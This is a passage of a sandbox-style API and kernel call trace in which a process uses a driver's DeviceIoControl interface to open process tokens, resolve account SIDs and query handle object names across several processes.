ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.605] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.605] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.605] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x934) returned 0xc8 [0226.605] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.605] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80020d7b30, HandleInformation=0x0) returned 0x0 [0226.605] ObOpenObjectByPointer (in: Object=0xfffffa80020d7b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.605] ObfDereferenceObject (Object=0xfffffa80020d7b30) returned 0x14 [0226.605] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.605] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.605] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.605] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.605] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.607] CloseHandle (hObject=0xc4) returned 1 [0226.607] CloseHandle (hObject=0xc8) returned 1 [0226.607] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.607] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.607] PsLookupProcessByProcessId (in: ProcessId=0x934, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.607] PsAcquireProcessExitSynchronization () returned 0x0 [0226.608] KeStackAttachProcess (in: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880052b35d0) [0226.608] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020e84a0, HandleInformation=0x0) returned 0x0 [0226.608] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.608] PsReleaseProcessExitSynchronization () returned 0x2 [0226.608] ObfDereferenceObject (Object=0xfffffa80020d7b30) returned 0x12 [0226.608] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.608] ObfDereferenceObject (Object=0xfffffa80020e84a0) returned 0x1 [0226.608] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.608] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.608] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.608] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0226.608] PsLookupProcessByProcessId (in: ProcessId=0x934, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.608] PsAcquireProcessExitSynchronization () returned 0x0 [0226.608] KeStackAttachProcess (in: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880052b35d0) [0226.608] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020e8070, HandleInformation=0x0) returned 0x0 [0226.608] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.608] PsReleaseProcessExitSynchronization () returned 0x2 [0226.608] ObfDereferenceObject (Object=0xfffffa80020d7b30) returned 0x12 [0226.608] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.608] ObfDereferenceObject (Object=0xfffffa80020e8070) returned 0x1 [0226.609] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.609] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.609] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.609] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.609] PsLookupProcessByProcessId (in: ProcessId=0x934, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.609] PsAcquireProcessExitSynchronization () returned 0x0 [0226.609] KeStackAttachProcess (in: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880052b35d0) [0226.609] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.609] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.609] PsReleaseProcessExitSynchronization () returned 0x2 [0226.609] ObfDereferenceObject (Object=0xfffffa80020d7b30) returned 0x12 [0226.609] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.609] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.609] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.609] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x944) returned 0xc8 [0226.609] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.609] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80020fc740, HandleInformation=0x0) returned 0x0 [0226.609] ObOpenObjectByPointer (in: Object=0xfffffa80020fc740, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.609] ObfDereferenceObject (Object=0xfffffa80020fc740) returned 0x14 [0226.609] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.609] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.609] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.610] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.610] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.612] CloseHandle (hObject=0xc4) returned 1 [0226.612] CloseHandle (hObject=0xc8) returned 1 [0226.612] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.612] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.612] PsLookupProcessByProcessId (in: ProcessId=0x944, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.612] PsAcquireProcessExitSynchronization () returned 0x0 [0226.612] KeStackAttachProcess (in: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880052b35d0) [0226.612] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020d7510, HandleInformation=0x0) returned 0x0 [0226.612] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.612] PsReleaseProcessExitSynchronization () returned 0x2 [0226.612] ObfDereferenceObject (Object=0xfffffa80020fc740) returned 0x12 [0226.612] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.612] ObfDereferenceObject (Object=0xfffffa80020d7510) returned 0x1 [0226.612] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.612] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.612] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.612] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0226.613] PsLookupProcessByProcessId (in: ProcessId=0x944, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.613] PsAcquireProcessExitSynchronization () returned 0x0 [0226.613] KeStackAttachProcess (in: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880052b35d0) [0226.613] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020fccb0, HandleInformation=0x0) returned 0x0 [0226.613] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.613] PsReleaseProcessExitSynchronization () returned 0x2 [0226.613] ObfDereferenceObject (Object=0xfffffa80020fc740) returned 0x12 [0226.613] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.613] ObfDereferenceObject (Object=0xfffffa80020fccb0) returned 0x1 [0226.613] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.613] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.613] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.613] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.613] PsLookupProcessByProcessId (in: ProcessId=0x944, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.613] PsAcquireProcessExitSynchronization () returned 0x0 [0226.613] KeStackAttachProcess (in: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880052b35d0) [0226.613] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.613] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.613] PsReleaseProcessExitSynchronization () returned 0x2 [0226.613] ObfDereferenceObject (Object=0xfffffa80020fc740) returned 0x12 [0226.613] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.613] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.613] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.613] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xc8 [0226.614] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.614] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002108790, HandleInformation=0x0) returned 0x0 [0226.614] ObOpenObjectByPointer (in: Object=0xfffffa8002108790, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.614] ObfDereferenceObject (Object=0xfffffa8002108790) returned 0x14 [0226.614] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.614] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.614] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.614] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.614] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.616] CloseHandle (hObject=0xc4) returned 1 [0226.616] CloseHandle (hObject=0xc8) returned 1 [0226.616] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.616] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.616] PsLookupProcessByProcessId (in: ProcessId=0x954, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.616] PsAcquireProcessExitSynchronization () returned 0x0 [0226.616] KeStackAttachProcess (in: PROCESS=0xfffffa8002108790, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002108790, ApcState=0xfffff880052b35d0) [0226.616] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800210d2b0, HandleInformation=0x0) returned 0x0 [0226.616] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.616] PsReleaseProcessExitSynchronization () returned 0x2 [0226.616] ObfDereferenceObject (Object=0xfffffa8002108790) returned 0x12 [0226.616] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.616] ObfDereferenceObject (Object=0xfffffa800210d2b0) returned 0x1 [0226.616] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.616] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.616] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.616] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0226.616] PsLookupProcessByProcessId (in: ProcessId=0x954, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.616] PsAcquireProcessExitSynchronization () returned 0x0 [0226.616] KeStackAttachProcess (in: PROCESS=0xfffffa8002108790, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002108790, ApcState=0xfffff880052b35d0) [0226.616] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800210bd00, HandleInformation=0x0) returned 0x0 [0226.616] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.617] PsReleaseProcessExitSynchronization () returned 0x2 [0226.617] ObfDereferenceObject (Object=0xfffffa8002108790) returned 0x12 [0226.617] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.617] ObfDereferenceObject (Object=0xfffffa800210bd00) returned 0x1 [0226.617] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.617] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.617] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.617] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.617] PsLookupProcessByProcessId (in: ProcessId=0x954, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.617] PsAcquireProcessExitSynchronization () returned 0x0 [0226.617] KeStackAttachProcess (in: PROCESS=0xfffffa8002108790, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002108790, ApcState=0xfffff880052b35d0) [0226.617] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.617] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.617] PsReleaseProcessExitSynchronization () returned 0x2 [0226.617] ObfDereferenceObject (Object=0xfffffa8002108790) returned 0x12 [0226.617] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.617] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.617] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.617] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x964) returned 0xc8 [0226.617] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.617] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002119b30, HandleInformation=0x0) returned 0x0 [0226.617] ObOpenObjectByPointer (in: Object=0xfffffa8002119b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.617] ObfDereferenceObject (Object=0xfffffa8002119b30) returned 0x14 [0226.617] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.618] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.618] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.618] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.618] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.620] CloseHandle (hObject=0xc4) returned 1 [0226.620] CloseHandle (hObject=0xc8) returned 1 [0226.620] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.620] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.620] PsLookupProcessByProcessId (in: ProcessId=0x964, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.620] PsAcquireProcessExitSynchronization () returned 0x0 [0226.620] KeStackAttachProcess (in: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880052b35d0) [0226.620] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002103800, HandleInformation=0x0) returned 0x0 [0226.620] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.620] PsReleaseProcessExitSynchronization () returned 0x2 [0226.620] ObfDereferenceObject (Object=0xfffffa8002119b30) returned 0x12 [0226.620] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.620] ObfDereferenceObject (Object=0xfffffa8002103800) returned 0x1 [0226.620] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.620] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.620] RtlAllocateHeap 